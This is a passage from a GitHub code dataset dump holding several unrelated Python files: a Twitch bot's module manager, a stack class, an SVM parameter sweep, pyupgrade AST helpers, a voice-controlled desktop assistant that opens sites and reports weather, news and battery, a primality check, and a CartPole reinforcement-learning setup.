log.error(f\"Module {module_id} is not in the list of enabled modules pajaW\")\n return False\n\n self.modules.remove(module)\n\n return True\n\n def load(self, do_reload: bool = True) -> ModuleManager:\n \"\"\"Load module classes\"\"\"\n\n from pajbot.modules import available_modules\n\n self.all_modules = [module(self.bot) for module in available_modules]\n\n with DBManager.create_session_scope() as db_session:\n # Make sure there's a row in the DB for each module that's available\n db_modules = db_session.query(Module).all()\n for module in self.all_modules:\n mod = find(lambda db_module: db_module.id == module.ID, db_modules)\n if mod is None:\n log.info(f\"Creating row in DB for module {module.ID}\")\n mod = Module(module.ID, enabled=module.ENABLED_DEFAULT)\n db_session.add(mod)\n\n if do_reload is True:\n # Mark modules as enabled/disabled if their state has changed\n self.reload()\n\n return self\n\n def _disable_all_modules(self) -> None:\n for module in self.modules:\n module.disable(self.bot)\n\n def _load_enabled_modules(self) -> None:\n \"\"\"Load modules from the database and put them into the modules list\"\"\"\n with DBManager.create_session_scope() as db_session:\n for enabled_module in db_session.query(Module).filter_by(enabled=True):\n module = self.get_module(enabled_module.id)\n if module is not None:\n options = {}\n if enabled_module.settings is not None:\n try:\n options[\"settings\"] = json.loads(enabled_module.settings)\n except ValueError:\n log.warning(\"Invalid JSON\")\n\n self.modules.append(module.load(**options))\n module.on_loaded()\n module.enable(self.bot)\n\n def _disable_orphan_modules(self) -> None:\n to_be_removed: list[BaseModule] = []\n self.modules.sort(key=lambda m: 1 if m.PARENT_MODULE is not None else 0)\n for module in self.modules:\n if module.PARENT_MODULE is None:\n module.submodules = []\n else:\n parent = find(lambda m: m.__class__ == module.PARENT_MODULE, self.modules)\n if parent is not None:\n parent.submodules.append(module)\n module.parent_module = parent\n else:\n # log.warning('Missing parent for module {}, disabling it.'.format(module.NAME))\n module.parent_module = None\n to_be_removed.append(module)\n\n for module in to_be_removed:\n module.disable(self.bot)\n self.modules.remove(module)\n\n def reload(self) -> None:\n # TODO: Make disable/enable better, so we don't need to disable modules\n # that we're just going to enable again further down below.\n self._disable_all_modules()\n\n self.modules.clear()\n\n self._load_enabled_modules()\n\n self._disable_orphan_modules()\n\n # Perform a last on_loaded call on each module.\n # This is used for things that require submodules to be loaded properly\n # i.e. the quest system\n for module in self.modules:\n module.on_loaded()\n\n def __getitem__(self, module_id: str) -> Optional[BaseModule]:\n for enabled_module in self.modules:\n if enabled_module.ID == module_id:\n return enabled_module\n\n return None\n\n def __contains__(self, module_id: str) -> bool:\n \"\"\"We override the contains operator for the ModuleManager.\n This allows us to use the following syntax to check if a module is enabled:\n if 'duel' in module_manager:\n \"\"\"\n\n for enabled_module in self.modules:\n if enabled_module.ID == module_id:\n return True\n\n return False\n","repo_name":"pajbot/pajbot","sub_path":"pajbot/models/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":6809,"program_lang":"python","lang":"en","doc_type":"code","stars":278,"dataset":"github-code","pt":"57"} +{"seq_id":"14374487244","text":"class Pile :\r\n def __init__(self):\r\n self.lst = []\r\n\r\n def est_vide(self):\r\n if self.lst == [] :\r\n return True\r\n else:\r\n return False\r\n\r\n def empiler(self, e):\r\n self.lst.append(e)\r\n return self.lst\r\n\r\n def sommet(self):\r\n if self.est_vide() == True :\r\n return\r\n else:\r\n return self.lst[-1]\r\n\r\n def depiler(self):\r\n assert(self.lst != []),'erreur'\r\n return self.lst.pop()\r\n\r\n\r\n def __str__(self): #__repr__\r\n self.str = \"\"\r\n for i in range(len(self.lst)):\r\n self.str = str(self.str) + str('|') + str(self.lst[-1-i]) + str('|') + str('\\n')\r\n if self.est_vide() == True:\r\n return str('|' + ' ' + '|')\r\n return str(self.str)\r\n\r\n def __repr__(self):\r\n self.str = \"\"\r\n for i in range(len(self.lst)):\r\n self.str = str(self.str) + str('|') + str(self.lst[-1-i]) + str('|') + str('\\n')\r\n return str(self.str)\r\n\r\n#-------------Ajoute de méthode-----------------#\r\n def hauteur(self):\r\n tab = []\r\n while self.est_vide() == False:\r\n tab.append(self.sommet())\r\n self.depiler()\r\n tab.reverse()\r\n for i in tab:\r\n self.empiler(i)\r\n return len(tab)\r\n","repo_name":"inca300/Calculatrice","sub_path":"Pile.py","file_name":"Pile.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"72543719858","text":"from tools import get_summary_graph, calculate_weights, update_summary_graph, get_summary_features, get_specific_graph_list\r\nfrom dataset import get_dataset\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.svm import LinearSVC\r\nfrom scipy import io\r\nimport numpy as np\r\nimport os\r\nfrom config import datasets\r\n\r\nparams_p = np.arange(0, 2, 0.1)\r\nparams_alpha = [0.001, 0.003, 0.005, 0.01, 0.03, 0.05, 0.08, 0.1, 0.15, 0.2, 0.3, 0.5, 1.0]\r\nepochs = 10\r\n\r\n \r\nfor dataset in datasets:\r\n results = np.zeros([len(params_p), len(params_alpha)])\r\n data_dir, positive_group, negative_group = dataset\r\n # data_dir, positive_group, negative_group = 'ADNI', 'LMCI', 'AD'\r\n save_mat_name = os.path.join('./experiments-results', '-'.join([data_dir, positive_group, negative_group])+'_acc.mat')\r\n\r\n for i, p in enumerate(params_p):\r\n for j, alpha in enumerate(params_alpha):\r\n acc_list = []\r\n for epoch in range(epochs):\r\n pos_train_features, neg_train_features, pos_test_features, neg_test_features = get_dataset(data_dir, positive_group, negative_group, gamma=p, threshold=alpha, split_ratio=0.7)\r\n train_x = np.concatenate([pos_train_features, neg_train_features])\r\n train_y = np.array([0]*pos_train_features.shape[0]+[1]*neg_train_features.shape[0])\r\n test_x = np.concatenate([pos_test_features, neg_test_features])\r\n test_y = np.array([0]*pos_test_features.shape[0]+[1]*neg_test_features.shape[0])\r\n clf = LinearSVC(max_iter=300000)\r\n clf.fit(train_x, train_y)\r\n test_result = (clf.predict(test_x) == test_y)\r\n acc = float(test_result.sum()) / len(test_result)\r\n acc_list.append(acc)\r\n results[i, j] = sum(acc_list)/epochs\r\n\r\n io.savemat(save_mat_name, {'results':results})","repo_name":"xiangzhumeng16/TempGSL","sub_path":"parameter.py","file_name":"parameter.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"32784962908","text":"import ast\nimport warnings\nfrom typing import Container\nfrom typing import Dict\nfrom typing import Set\nfrom typing import Union\n\nfrom tokenize_rt import Offset\n\n\ndef ast_parse(contents_text: str) -> ast.Module:\n # intentionally ignore warnings, we might be fixing warning-ridden syntax\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n return ast.parse(contents_text.encode())\n\n\ndef ast_to_offset(node: Union[ast.expr, ast.stmt]) -> Offset:\n return Offset(node.lineno, node.col_offset)\n\n\ndef is_name_attr(\n node: ast.AST,\n imports: Dict[str, Set[str]],\n mod: str,\n names: Container[str],\n) -> bool:\n return (\n isinstance(node, ast.Name) and\n node.id in names and\n node.id in imports[mod]\n ) or (\n isinstance(node, ast.Attribute) and\n isinstance(node.value, ast.Name) and\n node.value.id == mod and\n node.attr in names\n )\n\n\ndef has_starargs(call: ast.Call) -> bool:\n return (\n any(k.arg is None for k in call.keywords) or\n any(isinstance(a, ast.Starred) for a in call.args)\n )\n","repo_name":"HaydnG/dimensionality-reduction-ui","sub_path":"venv/Lib/site-packages/pyupgrade/_ast_helpers.py","file_name":"_ast_helpers.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"32025441282","text":"import pyttsx3\r\nimport speech_recognition as sr\r\nimport os\r\nimport subprocess\r\n#from requests import request , session\r\n#from pprint import pprint as pp\r\nimport json\r\nimport requests \r\nimport datetime \r\nfrom datetime import date\r\nimport time\r\nimport calendar\r\nimport warnings\r\nimport random\r\nimport wikipedia\r\nimport webbrowser\r\nfrom pywhatkit import sendwhatmsg_instantly\r\nimport smtplib\r\nimport sys\r\nimport pyjokes\r\nimport pyautogui\r\nimport PyPDF2\r\nfrom tkinter.filedialog import *\r\nimport psutil\r\nimport speedtest\r\nimport wolframalpha\r\n\r\nwarnings.filterwarnings(\"ignore\") #ignoring all the warnings\r\n\r\nif sys.platform == \"win32\":\r\n engine=pyttsx3.init('sapi5')\r\n voices=engine.getProperty('voices')\r\n engine.setProperty('voice',voices[1].id)\r\nelse:\r\n engine=pyttsx3.init('nsss') #sapi5 - SAPI5 on Windows #nsss - NSSpeechSynthesizer on Mac OS X #espeak - eSpeak on every other platform\r\n voices=engine.getProperty('voices')\r\n #for i in range(48):\r\n #print(voices[i].id)\r\n engine.setProperty('voice',voices[10].id)#10b 17 26 28 37 39\r\n\r\ndef speak(audio): #fn for talking txt to spch,audio is string\r\n engine.say(audio)#say fn for speaking\r\n print(audio)\r\n engine.runAndWait()\r\n\r\ndef take_command():\r\n r=sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print('Go ahead,I am listening....')\r\n #r.pause_threshold=1\r\n r.adjust_for_ambient_noise(source)\r\n audio=r.listen(source)\r\n try:\r\n print('Hold on a momment,Recognizing...')\r\n query=r.recognize_google(audio,language='en-in')\r\n print(f'User said:{query}\\n')\r\n except:\r\n speak(\"There was some problem please try again\") \r\n return \"None\"\r\n return query\r\n\r\ndef wish():\r\n hour = int(datetime.datetime.now().hour)\r\n if hour>=0 and hour<12:\r\n speak(\"Good Morning!\")\r\n\r\n elif hour>=12 and hour<18:\r\n speak(\"Good Afternoon!\") \r\n\r\n else:\r\n speak(\"Good Evening!\") \r\n\r\n speak(\"I am COSMOS. How may I help you\")\r\n\r\ndef open_file(filename,filename1):\r\n if sys.platform == \"win32\":\r\n os.startfile(filename)\r\n else:\r\n try:\r\n opener = f'/Applications/{filename}.app/Contents/MacOS/{filename1}' \r\n subprocess.call([opener]) \r\n except:\r\n opener = f'/System/Applications/{filename}.app/Contents/MacOS/{filename1}' \r\n subprocess.call([opener]) \r\n\r\ndef sendEmail(to,content):\r\n server=smtplib.SMTP(\"smtp.gmail.com\",587)\r\n server.ehlo()\r\n server.starttls()\r\n server.login(\"email\",\"password\")\r\n server.sendmail(\"email id\",to,content)\r\n server.close()\r\n\r\ndef news():\r\n #https://newsapi.org/ ##get apikey from here\r\n api_key='Your api key here!!!'\r\n main_url = f'http://newsapi.org/v2/top-headlines?sources=techcrunch&apiKey={api_key}'\r\n\r\n main_page = requests.get(main_url).json()\r\n # print(main_page)\r\n articles = main_page[\"articles\"]\r\n # print(articles)\r\n head = []\r\n numbers=[\"first\",\"second\",\"third\",\"fourth\",\"fifth\"]\r\n for ar in articles:\r\n head.append(ar[\"title\"])\r\n for i in range (len(numbers)):\r\n speak(f\"today's {numbers[i]} news is: {head[i]}\")\r\n\r\ndef crypto(slug):\r\n #https://coinmarketcap.com/ ##get apikey from here\r\n apiurl='https://pro-api.coinmarketcap.com'\r\n headers = {\r\n 'Accepts': 'application/json',\r\n 'X-CMC_PRO_API_KEY': 'Your api key here!!!',\r\n }\r\n\r\n session=requests.session()\r\n session.headers.update(headers)\r\n\r\n def coins_price(apiurl,slug):\r\n url=apiurl+'/v1/cryptocurrency/quotes/latest'\r\n parameters={'slug':slug}\r\n r=session.get(url,params=parameters)\r\n data=r.json()['data']\r\n all=str(data)\r\n x=all.find('price')\r\n all=all[x:x+20]\r\n for p in all.split():\r\n try: \r\n float(p)\r\n price=p\r\n except:\r\n pass\r\n speak(f'{slug} price is {price}')\r\n return price\r\n \r\n #pp(coins_price(apiurl,slug))\r\n coins_price(apiurl,slug)\r\n\r\ndef weather():\r\n def loc():\r\n try:\r\n ipadd=requests.get(\"https://api.ipify.org\").text\r\n url=\"https://get.geojs.io/v1/ip/geo/\"+ipadd+\".json\"\r\n geo_requests= requests.get(url)\r\n geo_data=geo_requests.json()\r\n city=geo_data['city']\r\n except:\r\n city='delhi'\r\n return city\r\n\r\n #https://home.openweathermap.org/ ##get apikey from here\r\n api_key = 'Your api key here!!!'\r\n base_url = 'https://api.openweathermap.org/data/2.5/weather?'\r\n city_name = loc()\r\n url = base_url + \"&q=\" + city_name + \"&appid=\" + api_key \r\n session=requests.session()\r\n r = session.get(url)\r\n data = r.json()\r\n #data\r\n if data[\"cod\"] != \"404\":\r\n y = data[\"main\"]\r\n current_temperature = y[\"temp\"]\r\n current_humidiy = y[\"humidity\"]\r\n z = data[\"weather\"]\r\n weather_description = z[0][\"description\"]\r\n #print(\" Temperature is \" +str(int(current_temperature-273.15)) +\" degree celcius\\n humidity is \" + str(current_humidiy) +\"%\\n description \" + str(weather_description))\r\n speak(\" Temperature is \" +str(int(current_temperature-273.15)) +\" degree celcius\\n humidity is \" + str(current_humidiy) +\"%\\n with \" + str(weather_description)+'in '+city_name)\r\n \r\n\r\ndef pdf_reader():\r\n book=askopenfilename()\r\n try: \r\n pdfreader=PyPDF2.PdfFileReader(book)\r\n pages=pdfreader.numPages\r\n speak(f\"Total numbers of pages in this pdf are {pages}\")\r\n speak(\"sir please enter the page number you want me to read\")\r\n pg=int(input(\"please enter the page number:\"))\r\n for num in range(pg,pages):\r\n page=pdfreader.getPage(pg)\r\n text=page.extractText()\r\n speak(text)\r\n except :\r\n speak(\"Operation Cancelled !\") \r\n \r\ndef adv_search():\r\n query=input('Question: ')\r\n #https://products.wolframalpha.com/api/ ##get apikey from here\r\n app_id='Your api key here!!!'\r\n client=wolframalpha.Client(app_id)\r\n if 'no thanks' in query or 'thanks' in query or 'close advance search mode' in query:\r\n speak('closing advance search mode')\r\n else:\r\n res=client.query(query)\r\n ans=next(res.results).text\r\n speak(ans)\r\n speak('want to search anything else?')\r\n adv_search() \r\n\r\ndef TaskExecution():\r\n\r\n # function for coin toss task\r\n def htLine1():\r\n speak(\"It's \" + res)\r\n def htLine2():\r\n speak(\"You got \" + res)\r\n def htLine3():\r\n speak(\"It landed on \" + res)\r\n\r\n wish()\r\n bye=True\r\n while bye:\r\n\r\n query=take_command().lower()\r\n #query=input() ##comment above and remove this for typing instead of speaking for testing\r\n\r\n # Tasks\r\n if \"what is your name\" in query:\r\n speak('I am COSMOS your virtual assistant.')\r\n continue\r\n \r\n if \"tell me about yourself\" in query:\r\n speak('I am COSMOS your virtual assistant. What can I do for you?')\r\n continue\r\n\r\n elif 'why cosmos' in query or 'Why is your name cosmos' in query:\r\n speak(\"Just like cosmos is filled with endless possibilities this program also have endless possibilites and thats why cosmos\")\r\n continue\r\n\r\n elif 'price of' in query or 'tell me the price of' in query:\r\n query=query.replace('tell me the price of ','')\r\n query=query.replace('price of ','')\r\n crypto(query)\r\n speak('need something else?')\r\n\r\n elif 'weather' in query:\r\n #query=query.replace('how is the weather in',' ')## can be made to take location ##not implemented\r\n #query=query.replace('weather in',' ')\r\n #query=query.replace('weather',' ')\r\n weather()\r\n speak('need something else?')\r\n\r\n elif \"open notepad\" in query:\r\n npath=\"C:\\\\WINDOWS\\\\system32\\\\notepad.exe\"\r\n os.startfile(npath)\r\n\r\n elif \"open command prompt\" in query:\r\n os.system(\"start cmd\") \r\n bye=False \r\n\r\n elif 'the time' in query:\r\n strTime=datetime.datetime.now().strftime('%H:%M')\r\n #print(f'its {strTime}')\r\n speak(f'its {strTime}')\r\n speak('you want me to do anything else?')\r\n\r\n elif \"todays date\" in query or \"the date\"in query:\r\n today = date.today()\r\n d2 = today.strftime(\"%B %d, %Y\")\r\n speak(f\"Today is {d2}\") \r\n speak('you want me to do anything else?')\r\n\r\n elif \"ip address\" in query:\r\n ip=requests.get('https://api.ipify.org').text#.text returns ip in unicode\r\n speak(f\"Your IP Address is {ip}\")\r\n speak('you want me to do anything else?')\r\n\r\n elif 'wikipedia' in query:\r\n speak('Searching in wikipedia')\r\n query=query.replace('wikipedia',' ')\r\n results=wikipedia.summary(query,sentences=2)\r\n speak('According to wikipedia')\r\n #print(results)\r\n speak(results)\r\n speak('you want me to do anything else')\r\n \r\n elif 'open google' in query:\r\n webbrowser.open(\"https://google.com\")\r\n bye=False\r\n \r\n elif 'open youtube' in query:\r\n webbrowser.open('https://youtube.com')\r\n bye=False\r\n\r\n elif 'what is' in query:\r\n #query=query.replace('what is',' ')\r\n result=wikipedia.summary(query,sentences=2)\r\n #print(result)\r\n speak(result)\r\n speak('anything else?')\r\n \r\n elif 'search in youtube' in query or 'open in youtube' in query: #search in youtube\r\n query=query.replace('search in youtube',' ')\r\n query=query.replace('open in youtube',' ')\r\n webbrowser.open(f'https://www.youtube.com/results?search_query={query}')\r\n speak(f'searchin in youtube {query}')\r\n bye=False\r\n\r\n #walframalpha\r\n elif 'advance search mode' in query or 'advanced search mode' in query:\r\n ##not gonna work by speaking input\r\n speak('Advance search mode activated')\r\n try:\r\n adv_search()\r\n except Exception as e:\r\n speak(\"Sorry,I am currently unable to find the answers.Please try again later\") \r\n speak('do you want me to do anything else?') \r\n continue\r\n\r\n elif 'search' in query or 'search in google' in query or 'open in google' in query: #search in google tab\r\n query=query.replace('search',' ')\r\n query=query.replace('search in google',' ')\r\n query=query.replace('open in google',' ')\r\n webbrowser.open(f\"https://google.com/search?q={query}\")\r\n speak(f'searching in google {query}')\r\n bye=False\r\n\r\n\r\n elif (\"open gfg\" in query or \"open geeksforgeeks\" in query):\r\n webbrowser.open(\"https://www.geeksforgeeks.org\")\r\n bye=False\r\n\r\n elif \"send message on whatsapp\" in query or 'send message' in query:\r\n speak(\"To whom should I send a message\")\r\n speak(\" Please type the number \")\r\n no=input(\"Enter the number:\")\r\n speak(\" what should I send ?\")\r\n speak('You will have to scan for whatsapp web.')\r\n subquery=take_command().lower()\r\n sendwhatmsg_instantly(f\"+91{no}\",f\"{subquery}\")\r\n bye=False\r\n\r\n elif \"email\" in query:\r\n try:\r\n speak(\"To whom do you want to send mail?\")\r\n to=input(\"Enter the mail id to whom you want to send:\")\r\n speak(\"what should i say?\")\r\n subquery=take_command().lower()\r\n sendEmail(to,subquery)\r\n speak(\"Email has been sent.\")\r\n speak('want to do anything else?')\r\n \r\n except Exception as e:\r\n speak(\"Sorry,I am currently unable to send the email.Please try again later\") \r\n speak('do you want me to do anything else?')\r\n\r\n elif 'visual studio code' in query or 'open code' in query or 'code' in query or 'visual code' in query:\r\n open_file('Visual Studio Code','Electron')\r\n speak('visual studio code is open now')\r\n bye=False\r\n \r\n elif 'safari' in query:\r\n open_file('Safari','Safari')\r\n speak('Safari is open now')\r\n bye=False\r\n \r\n elif 'calculator' in query:\r\n open_file('Calculator','Calculator')\r\n speak('Calculator is open now')\r\n bye=False\r\n\r\n elif 'chrome' in query:\r\n open_file('Google Chrome','Google Chrome')\r\n speak('Chrome is open now')\r\n bye=False\r\n\r\n elif \"close notepad\" in query:\r\n speak(\"okay sir, closing notepad\")\r\n os.system(\"taskkill/f /im notepad.exe\")\r\n speak('you want me to do anything else?')\r\n \r\n elif (\"close cmd\"in query or \"close command prompt\" in query):\r\n speak(\"okay sir, closing cmd\")\r\n os.system(\"taskkill /f /im cmd.exe\")\r\n speak('you want me to do anything else?')\r\n\r\n elif 'joke' in query or 'jokes' in query:\r\n joke = pyjokes.get_joke('en','all')\r\n #print(joke)\r\n speak(joke)\r\n speak('anything else?')\r\n\r\n elif 'jobs' in query or 'job' in query or 'job recommandation' in query or 'work' in query:\r\n platforms = [\r\n 'linkedin', 'indeed', 'glassdoor', 'hackerrank', 'naukri',\r\n 'intern shala'\r\n ]\r\n speak(\"Select a platform that you prefer:\")\r\n print('\\n'.join(platforms))\r\n statement1 = take_command().lower()\r\n #statement1 = input()\r\n if (statement1 == 0):\r\n continue\r\n if 'linkedin' in statement1 or 'LinkedIn' in statement1 or 'Linkedin' in statement1:\r\n webbrowser.open_new_tab(\"https://www.linkedin.com/jobs\")\r\n speak(\"LinkedIn is open now\")\r\n break\r\n elif 'indeed' in statement1:\r\n webbrowser.open_new_tab(\"https://www.indeed.com/jobs\")\r\n speak(\"Indeed is open now\")\r\n break\r\n elif 'glassdoor' in statement1:\r\n webbrowser.open_new_tab(\"https://www.glassdoor.com/jobs\")\r\n speak(\"Glassdoor is open now\")\r\n break\r\n elif 'hackerrank' in statement1:\r\n webbrowser.open_new_tab(\r\n \"https://www.hackerrank.com/jobs/search\")\r\n speak(\"HackerRank is open now\")\r\n break\r\n elif 'naukri' in statement1:\r\n webbrowser.open_new_tab(\"https://www.naukri.com/jobs\")\r\n speak(\"Naukri is open now\")\r\n break\r\n elif 'intern shala' in statement1:\r\n webbrowser.open_new_tab('internshala.com')\r\n speak('Intern Shala is open now')\r\n break\r\n else:\r\n speak(\"Sorry we couldn't find your search!!!\")\r\n speak('you want me to do anything else?')\r\n #time.sleep(3)\r\n \r\n\r\n elif \"shut down the system\" in query:\r\n os.system(\"shutdown /s /t 5\")\r\n\r\n elif 'movie ticket booking' in query or 'movie booking' in query or 'movie ticket' in query:\r\n speak('opening bookmyshow')\r\n webbrowser.open_new_tab(\"https://in.bookmyshow.com/\")\r\n speak(\" Book my show website is open now\")\r\n bye=False\r\n\r\n elif \"restart the system\" in query:\r\n os.system(\"shutdown /r /t 5\")\r\n\r\n elif 'online courses' in query or 'course' in query:\r\n platforms = [\r\n 'coursera', 'udemy', 'edx', 'skillshare', 'datacamp', 'udacity'\r\n ]\r\n speak(\"Select a platform that you prefer : \")\r\n print(\"\\n\".join(platforms))\r\n statement1 = take_command().lower()\r\n if statement1 == 0:\r\n continue\r\n if 'coursera' in statement1:\r\n webbrowser.open_new_tab(\"https://www.coursera.org\")\r\n speak(\"Coursera is open now\")\r\n bye=False\r\n elif 'udemy' in statement1:\r\n webbrowser.open_new_tab(\"https://www.udemy.com\")\r\n speak(\"udemy is open now\")\r\n bye=False\r\n elif 'edx' in statement1:\r\n webbrowser.open_new_tab(\"https://www.edx.org/\")\r\n speak(\"edx is open now\")\r\n bye=False\r\n elif 'skillshare' in statement1:\r\n webbrowser.open_new_tab(\"https://www.skillshare.com\")\r\n speak(\"skill share is open now\")\r\n bye=False\r\n elif 'datacamp' in statement1:\r\n webbrowser.open_new_tab(\"https://www.datacamp.com\")\r\n speak(\"datacamp is open now\")\r\n bye=False\r\n elif 'udacity' in statement1:\r\n webbrowser.open_new_tab(\"https://www.udacity.com\")\r\n speak(\"udacity is open now\")\r\n bye=False\r\n else:\r\n speak(\"Sorry we couldn't find your search!!!\")\r\n speak('you want me to do anything else?')\r\n\r\n elif 'train ticket booking' in query or 'train booking' in query or 'train ticket' in query or 'train ticket' in query:\r\n speak('opening website for train ticket booking')\r\n webbrowser.open_new_tab(\"https://www.railyatri.in/train-ticket/\")\r\n speak(\" IRCTC website is open now, have a good journey !\")\r\n bye=False\r\n\r\n elif 'bus ticket booking' in query or 'bus booking' in query or 'bus ticket' in query:\r\n speak('opening website for bus ticket booking')\r\n webbrowser.open_new_tab(\"https://www.redbus.in\")\r\n speak(\" Red bus website is open now, have a good journey !\")\r\n bye=False\r\n\r\n elif 'airplane ticket booking' in query or 'airplane booking' in query or 'airplane ticket' in query:\r\n speak('opening website for airplane ticket booking')\r\n webbrowser.open_new_tab(\"https://www.goindigo.in\")\r\n speak(\" Indigo website is open now, have a good journey !\")\r\n bye=False\r\n\r\n elif \"hotel\" in query or \"hotel booking\" in query:\r\n speak('Opening go ibibo .com')\r\n webbrowser.open_new_tab('https://goibibo.com/hotels')\r\n bye=False\r\n\r\n elif \"sleep the system\" in query:\r\n os.system(\"rundll32.exe powrprof.dll,SetSuspendState 0,1,0\")\r\n\r\n elif 'switch the window' in query:\r\n if sys.platform == \"win32\":\r\n pyautogui.keyDown(\"alt\")\r\n pyautogui.press(\"tab\")\r\n time.sleep(1)\r\n pyautogui.keyUp(\"alt\") \r\n bye=False\r\n else:\r\n pyautogui.keyDown(\"command\")\r\n pyautogui.press(\"tab\")\r\n time.sleep(1)\r\n pyautogui.keyUp(\"command\") \r\n bye=False\r\n\r\n elif (\"tell me news\" in query or \"news\" in query):\r\n speak(\"Please wait, Fetching the latest news\")\r\n news()\r\n speak('need something else?')\r\n\r\n elif (\"tell me my location\" in query or \"location\" in query):\r\n speak(\"Hold on,Locating our current location\")\r\n try:\r\n ipadd=requests.get(\"https://api.ipify.org\").text\r\n url=\"https://get.geojs.io/v1/ip/geo/\"+ipadd+\".json\"\r\n geo_requests= requests.get(url)\r\n geo_data=geo_requests.json()\r\n city=geo_data['city']\r\n country=geo_data['country']\r\n speak(f\"We are in {city},{country}\")\r\n speak('need something else?')\r\n\r\n except Exception as e:\r\n speak(\"Sorry,I am unable to locate our current location due to poor connectivity. Please try after sometime.\")\r\n bye=False\r\n\r\n elif \"take a screenshot\" in query or \"take screenshot\" in query:\r\n name=datetime.datetime.now()\r\n speak(\"taking screenshot...\")\r\n time.sleep(3)\r\n img=pyautogui.screenshot()\r\n img.save(f\"{name}.png\")\r\n speak(\"Screenshot taken\") \r\n speak('need anything else?')\r\n\r\n elif \"read pdf\" in query or \" read book \" in query :\r\n pdf_reader()\r\n bye=False\r\n \r\n elif \"how much battery is left\" in query or \"how much power is left\" in query or \"battery\" in query:\r\n battery=psutil.sensors_battery()\r\n percentage=battery.percent\r\n speak(f\"We have {percentage} percent battery. \")\r\n if percentage>=50:\r\n speak(\"We have enough power to go on.\")\r\n elif percentage>=20 and percentage<50:\r\n speak(\"You shall connect the system to a charging point\") \r\n elif percentage<20:\r\n speak(\"Battery about to die,connect to a charging point as soon as possible\")\r\n speak('you want me to do anything else')\r\n\r\n elif \"internet speed\" in query:\r\n speak(\"Checking internet speed\")\r\n st=speedtest.Speedtest()\r\n dl=round(float(st.download())/8000000,2)\r\n up=round(float(st.upload())/8000000,2)\r\n speak(f\"Current downloading speed is {dl}mb/s while uploading speed is {up}\") \r\n speak('you want me to do anything else?')\r\n\r\n elif \"volume up\" in query:\r\n pyautogui.press(\"volumeup\")\r\n speak('you want me to do anything else?')\r\n elif \"volume down\" in query:\r\n pyautogui.press(\"volumedown\")\r\n speak('you want me to do anything else?')\r\n elif \"volume mute\" in query or \"mute\" in query:\r\n pyautogui.press(\"volumemute\") \r\n speak('you want me to do anything else?')\r\n\r\n elif 'flip the coin' in query or 'toss the coin' in query or 'toss a coin' in query or 'flip a coin' in query:\r\n chances = ['Heads', 'Tails']\r\n res = random.choice(chances)\r\n picLine = random.randint(1, 3)\r\n lines = [htLine1, htLine2, htLine3]\r\n lines[picLine - 1]()\r\n speak('you want me to do anything else?')\r\n\r\n elif 'dice' in query:\r\n num = random.randint(1, 6)\r\n speak(\"Your rolled \" + str(num)) \r\n speak('you want me to do anything else?')\r\n\r\n elif 'bye' in query or 'no' in query or ' no thanks' in query:\r\n speak('Untill next time')\r\n bye=False\r\n\r\n else:\r\n speak(\"Sorry,I don't know how to do that right now but i am still learning how to be more helpful\")\r\n speak('anything else?')\r\n #time.sleep(2)\r\n\r\nif __name__==\"__main__\":\r\n TaskExecution()","repo_name":"Nishit014/COSMOS-Virtual-Assistant","sub_path":"cosmos_virtual_assistant_uf.py","file_name":"cosmos_virtual_assistant_uf.py","file_ext":"py","file_size_in_byte":23209,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"39965113530","text":"#determinar si un numero ingresado por el usuario es primo.\n#un numero primo: tiene, extactamente, 2 divisores positivos.\n#1 y si mismo.\n#ej 5 es primo, pues unico dos divisores 5, 1.\n\n#¿cuando un numero divide a otro?\n#sea n un natural, i otro natural, i divide a n si el rseto de dividir a n por i\n#es 0(y obtenemos un cociente entero).\n\n#EJ 10.\n#¿caules son los candidatos divisores de 10?\n#[1,10]=1,2,3,4,5,6,,7,8,9,10.\n\n#¿cuales son los divisores de 10?\n#Divisores de 10: 1,2,5,10\n\nn=int(input(\"ingresar un valor para n: \"))\n\ncont_divisores=0 #cantidad de divisores de n\nfor i in range (1,n+1):\n #resto=n%i variable.\n if n%i==0:#se encontro un divisor de n.\n cont_divisores=cont_divisores+1#se incrementa en 1 la cantidad de divisores.\nif cont_divisores > 2:\n print(n,\"no es primo\")\nelse:\n print(n,\"es primo\")","repo_name":"AbelAlarconOK/INTRODUCCION-PROGRAMACION","sub_path":"INTRODUCCION-PROGRAMACION/Pracitca 3/primos con for.py","file_name":"primos con for.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"7355185030","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport random\nimport torch\nimport numpy as np\nfrom collections import deque\nfrom itertools import product\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom utils.cartpole import CartPoleEnv\nfrom agents.q_learner import Q_learner\nfrom agents.bq_learner import BQ_learner\n\n\n# In[2]:\n\n\nargs = dict()\nargs[\"BUFFER_SIZE\"] = int(500) # replay buffer size\nargs[\"BATCH_SIZE\"] = 32 # minibatch size\nargs[\"GAMMA\"] = 0.95 # discount factor\nargs[\"TAU\"] = 1e-3 # for soft update of target parameters\nargs[\"LR\"] = 0.001 # learning rate\nargs[\"UPDATE_EVERY\"] = 4 # how often to update the network\n\nenv_name = 'CartPole-v1'\n\ndef my_product(inp):\n return (dict(zip(inp.keys(), values)) for values in product(*inp.values()))\n\n\n# In[3]:\n\n\ndef transform_dict_to_tuple(param):\n param_list = []\n if \"seed\" not in param.keys():\n param_list += [0]\n else:\n param_list += [param[\"seed\"]]\n \n if \"length\" not in param.keys():\n param_list += [0.5]\n else:\n param_list += [param[\"length\"]]\n \n if \"gravity\" not in param.keys():\n param_list += [9.8]\n else:\n param_list += [param[\"gravity\"]]\n \n if \"force_mag\" not in param.keys():\n param_list += [10.0]\n else:\n param_list += [param[\"force_mag\"]]\n return tuple(param_list)\n\n\n# In[4]:\n\n\nclass Task_Wrapper():\n def __init__(self, env_name, params):\n self.env_name = env_name\n 